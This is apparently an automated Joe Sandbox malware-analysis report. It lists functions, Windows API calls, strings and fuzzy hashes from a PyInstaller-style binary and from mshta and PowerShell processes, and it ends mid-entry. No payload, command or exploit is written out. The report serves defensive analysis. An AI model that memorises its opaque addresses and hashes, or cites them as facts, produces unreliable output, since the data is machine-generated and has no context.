FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3AA
FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3BB
FlsSetValue.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3CC
SetLastError.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB3E7

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction ID: 91b4b69916f986d88ed171446b9ea7620022922d002332079523abcbcc9a57ba
Opcode Fuzzy Hash: 6c88e88182f069636ae7df0ba171e708af9cab9deaf2d86c464056bb8d47fe11
Instruction Fuzzy Hash: CE117C21F8C24A82FB687B216E5013DD1625F447B8FC44335EA3E467DEFE2CA44183A0

Function 00007FF7F91E2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7F91E23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF7F91E248E
DeleteObject.GDI32 ref: 00007FF7F91E24C1
DestroyIcon.USER32 ref: 00007FF7F91E24D3

Strings

Unhandled exception in script, xrefs: 00007FF7F91E23F8

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction ID: cde9648390806a3dbab9a3a180ee4fc0d4614f09e5cc568622a36302ccc22a9d
Opcode Fuzzy Hash: 9d37adb8919aaa9301242e1672c0db5e18d6b44b4274937772719b263de12092
Instruction Fuzzy Hash: 01314F72A096828AEB64BF21FC552F9A360FF88788F840135EA5D87A99DF3CD1058751

Function 00007FF7F91E2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7F91E918F,?,00007FF7F91E3C55), ref: 00007FF7F91E2BA0
MessageBoxW.USER32 ref: 00007FF7F91E2C2A

Strings

WARNING, xrefs: 00007FF7F91E2BAF
[PYI-%d:%ls] , xrefs: 00007FF7F91E2BA8
Warning, xrefs: 00007FF7F91E2C1D

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 43b3f26000dfdfdebc77c898112c2a125ff82fc087ed68cdcf59092c872b7465
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: D221A372B08B4182E761AF14FC447AAA364EB88784F800135EE9D976A9DF3CE645C790

Function 00007FF7F91F9AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7F91F9B1D
GetProcAddress.KERNEL32 ref: 00007FF7F91F9B33
FreeLibrary.KERNEL32 ref: 00007FF7F91F9B5A

Strings

CorExitProcess, xrefs: 00007FF7F91F9B2C
mscoree.dll, xrefs: 00007FF7F91F9B14

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 8acd96ae15b1f5222ef32223886f4f8e04bce91f8c5792a94d5de098dfeb807b
Opcode Fuzzy Hash: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction Fuzzy Hash: E1F04F61A0960681FF64AF24AC557799330AF85765F940235D67E865FCDF2CD08887A0

Function 00007FF7F92093D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF7F9209400
_set_statfp.LIBCMT ref: 00007FF7F920941B
_set_statfp.LIBCMT ref: 00007FF7F9209437
_set_statfp.LIBCMT ref: 00007FF7F9209473

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: f0e261684316692b658090b94d62b5b04e2c0a62debf1f49f119fefb1cfc9640
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: C511BF6AE0CA1301F7D43924DC56375A0646F59370FC40634EBBF862FE8E2CA94941A1

Function 00007FF7F91FB400 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB41F
FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB43E
FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB466
FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB477
FlsSetValue.KERNEL32(?,?,?,00007FF7F91FA613,?,?,00000000,00007FF7F91FA8AE,?,?,?,?,?,00007FF7F91FA83A), ref: 00007FF7F91FB488

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction ID: 6d1cdb180982a9e06e76c52639da7bd5ebea41eadfa6d4c9bc6212ec23e341cf
Opcode Fuzzy Hash: 43a5c13e669b9c0dc60c9d5204f3187f9cebb30c335aac4df6ce1d0b58ad24f5
Instruction Fuzzy Hash: 40116320E4960A81FB69BF217E5117DD1665F447B8FC84334DA3E467DEFE2CA44182A0

Function 00007FF7F91FB294 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF7F91FB2A5
FlsSetValue.KERNEL32 ref: 00007FF7F91FB2C4
FlsSetValue.KERNEL32 ref: 00007FF7F91FB2EC
FlsSetValue.KERNEL32 ref: 00007FF7F91FB2FD
FlsSetValue.KERNEL32 ref: 00007FF7F91FB30E

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction ID: f73985c7d38c1c6319b02e53264c16cba8546c88ac09617218f9da3c9ea843eb
Opcode Fuzzy Hash: 8aa69c65082f5ed190463b1c2d732539134b8ecb86da000f77e4666776fecf75
Instruction Fuzzy Hash: 8B110A10F8920E81FB697E227C5117D91625F45378FC84734DA3E4A3DAFD2CB84282A1

Function 00007FF7F91FFC38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91FFF17

Part of subcall function 00007FF7F91F7AAC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F7AC9

Strings

ccs, xrefs: 00007FF7F91FFE52
UTF-16LEUNICODE, xrefs: 00007FF7F91FFEB5
UTF-8, xrefs: 00007FF7F91FFE96

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction ID: 64ce84591e8c3094fbaacc393b3e614ff5c2b413e64bd879d8eadf6881faf23c
Opcode Fuzzy Hash: 4ea7f6e1ba59c177a711b7ec70ee344f27d005a52efb2894dd87f7f788f8515e
Instruction Fuzzy Hash: B681D732D0824A85F7646E26AA10278B6B0AB1574CFD64035CB3D877CEFBADA501C3E1

Function 00007FF7F91EF2F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF7F91EF320
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF7F91EF408

Strings

csm, xrefs: 00007FF7F91EF45A
csm, xrefs: 00007FF7F91EF342

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction ID: b3f6f1b638aaccd5ce8becc5c48bb3e38bda516e9ef74176f2622eaf75cfd529
Opcode Fuzzy Hash: 1b872e8f6993e9c5779cc40e3c84c693849f7921638dfce8d08fafba9ab8d571
Instruction Fuzzy Hash: CF519F32E08282C7EB65BF22A844269B6B0EB54B84F944135EE6D477D9DF3CF450C792

Function 00007FF7F91FF9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7F91FFAEC
_get_daylight.LIBCMT ref: 00007FF7F91FFAFD
_get_daylight.LIBCMT ref: 00007FF7F91FFB0E
_isindst.LIBCMT ref: 00007FF7F91FFBD9

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: edcbd4e15d9d6da7310bf1c3debd539de2ac0b37613043e10e6cf010f95aaac0
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: DE51F772F081168AFB14EF25AD556BCABB1AB4035CF900135DE3D93BE9EB78A441C750

Function 00007FF7F9205B8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F92017D0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F9201803

_get_daylight.LIBCMT ref: 00007FF7F9205CA4
_get_daylight.LIBCMT ref: 00007FF7F9205CB5

Strings

?, xrefs: 00007FF7F9205C35

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: 400a9f948239cff76c9ed9ceeca87c3b98fe818b1014b88f3b30f1bf36b8fbec
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: 33412B12A0868541FBA4AF16AC0177AD670EF80BA4F944235EF7C86AEDDF3DD441C750

Function 00007FF7F91FCCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7F91FCDBF
GetLastError.KERNEL32 ref: 00007FF7F91FCDE1

Strings

U, xrefs: 00007FF7F91FCD6B

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: 908476807976353adf4b453babdfbc084a1d334f8dbb5a8bdd553b699048266d
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 9441B432B19A4581EB60AF25F8443ADA771FB88794F804031EE6D87B98EF3CD401CB90

Function 00007FF7F91FF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7F91FF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7F91FF6BA

Strings

:, xrefs: 00007FF7F91FF67E

Memory Dump Source

Source File: 00000002.00000002.1875580229.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000002.00000002.1875495657.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875640004.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875685379.00007FF7F9221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.1875766450.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction ID: 5bb81c8b85d3395f77290db51f4e3511d13725c8bf99afbafa521d9bab351c51
Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction Fuzzy Hash: 2221B422E0868582FB20AF16E84426DA3B1FB84B48FD54035D7BD437D8EFBCE545C6A1

Analysis Process: mshta.exePID: 7572, Parent PID: 7408COMMON

Executed Functions

Function 000001967A650FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000003.1476109088.000001967A650000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001967A650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_3_1967a650000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 6838205dc93ddb496558872b2fd0bb0b4bb12653ed14cd2db225efba7cc32931
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 4890021549540659D51861D10D5529C60406388654FD54480881690145E44D42D61162

Analysis Process: powershell.exePID: 7600, Parent PID: 7392COMMON

Executed Functions

Function 00007FF8850960C5 Relevance: 1.1, Instructions: 1109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8473b7a29589a604ebd4ca40c544e6ea87a886cc7bc8b3832230937d30e838c
Instruction ID: 544cf4c1e13093ce260a51ccc44a41f0d4c8918105fe495d54683e5a16babbf4
Opcode Fuzzy Hash: c8473b7a29589a604ebd4ca40c544e6ea87a886cc7bc8b3832230937d30e838c
Instruction Fuzzy Hash: 66423B26E0CA464FDB51EB9C98925F97BA0FF523A5F4801B7C44CCB197DE28A846C3D1

Function 00007FF88509BC40 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2dfb14f3dcdb572691e42227983c1db8b9b9d15dbfdaf46a6f6dfaf0915c4298
Instruction ID: 5706a31c87015b5d3dcf942cf8d9b6de5867bbdae509b23f17c631a0e785fa3a
Opcode Fuzzy Hash: 2dfb14f3dcdb572691e42227983c1db8b9b9d15dbfdaf46a6f6dfaf0915c4298
Instruction Fuzzy Hash: F2221531D0CA8A8FEF55DF68C895AB97BE1FF55764F1401BAC04CCB196DA28AC41CB81

Function 00007FF885099870 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ad92a22340b3d4f6556d36007782467a7a0a08d91cbf59ee9d9179bb6f36258
Instruction ID: 77f862b1d4ddeeecfb43543de97f2e07d937c5386ae9b023f5d52126bd960113
Opcode Fuzzy Hash: 1ad92a22340b3d4f6556d36007782467a7a0a08d91cbf59ee9d9179bb6f36258
Instruction Fuzzy Hash: F031E87191CB884FDB189B5CAC466F97BE0FB99711F00426FE459D3292CA60AC15CBC3

Function 00007FF884F7E986 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1549167547.00007FF884F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF884F7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff884f7d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 025fc480f1494255a3095274773606d5bd01076e4f46c64e7166e87925925d0b
Instruction ID: 3ab68de9f7979c0f714b660552bd118a0a8722fd588e5efba2e5d1ecb9d1a1a4
Opcode Fuzzy Hash: 025fc480f1494255a3095274773606d5bd01076e4f46c64e7166e87925925d0b
Instruction Fuzzy Hash: 1741D57240DFC44FE7569B3998959523FF0FF56360B2905EFD088CB1A3D628A84AC792

Function 00007FF88509C295 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551067542.00007FF885090000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885090000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0540608763ee2a177c7d6c38e0ec69c17280961b788b480d23c06ec309897fe8
Instruction ID: e59a50ec6e654d89609bd0d65d3697695b0213e5082674579e6ec1e28aa918c4
Opcode Fuzzy Hash: 0540608763ee2a177c7d6c38e0ec69c17280961b788b480d23c06ec309897fe8
Instruction Fuzzy Hash: DC31437480D7885EDB669BA88C456F67FE4EB93331F0441AFD099C7093CA24581AC792

Function 00007FF88516363C Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88c7975d2042c3779df69cec3d0fe97586e0610f5915c7e18e087df13d61dd03
Instruction ID: 4c232a04c6930a6bc780f4e0ab0f3273d10900b086fe416cbebb3f1b48d98f99
Opcode Fuzzy Hash: 88c7975d2042c3779df69cec3d0fe97586e0610f5915c7e18e087df13d61dd03
Instruction Fuzzy Hash: 9321D271E0DA864FEB96CA1C68956703BE1FF66760B1401BFC08DCB2A6DD18A845C741

Function 00007FF885166A0E Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1551931312.00007FF885160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF885160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff885160000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f8798f1e23c1b34d7b5e9707af8de9ba002ec7b1af8ed5dc0e806bdd34db552
Instruction ID: 1d2e4b46c2751e835e1181ec33facdd33d3ca011b5d319f72274df7267297403
